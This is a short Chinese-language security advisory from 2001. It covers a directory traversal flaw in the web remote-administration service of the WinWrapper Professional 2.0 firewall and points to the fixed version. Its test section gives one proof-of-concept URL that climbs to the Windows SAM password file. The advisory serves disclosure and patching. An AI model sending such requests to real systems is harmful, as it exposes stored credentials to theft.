发布日期：2001-08-21
更新日期：2001-08-23

受影响系统：

WinWrapper Professional 2.0 Ver.2.0.0
  - Microsoft Windows 2000 Server + SP2 [Japanese]

描述：

---

WinWrapper Professional 2.0是由ASCII NT公司开发的一个防火墙软件。

该软件主要用于保护WindowsNT/2000 系统，同时也提供了基于Web的远程管理功能，但
是用于远程管理的软件存在安全漏洞，导致远程攻击者以系统管理员身份阅读目标系统
上的任意文件。

<*来源：ARAI Yuu (LAC / y.arai@lac.co.jp)
  参考：http://www.lac.co.jp/security/english/snsadv_e/39_e.html
*>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

ARAI Yuu (LAC / y.arai@lac.co.jp)提供了如下测试代码：

http://<IP_Address_of_WinWrapper>:4096/../../../winnt/repair/sam


建议：

---

厂商补丁：

目前厂商已经发布了Ver.2.0.1，该版本不存在这个安全问题：
http://www.tsc.ant.co.jp/products/download.htm



浏览次数：3630
严重程度：0（网友投票）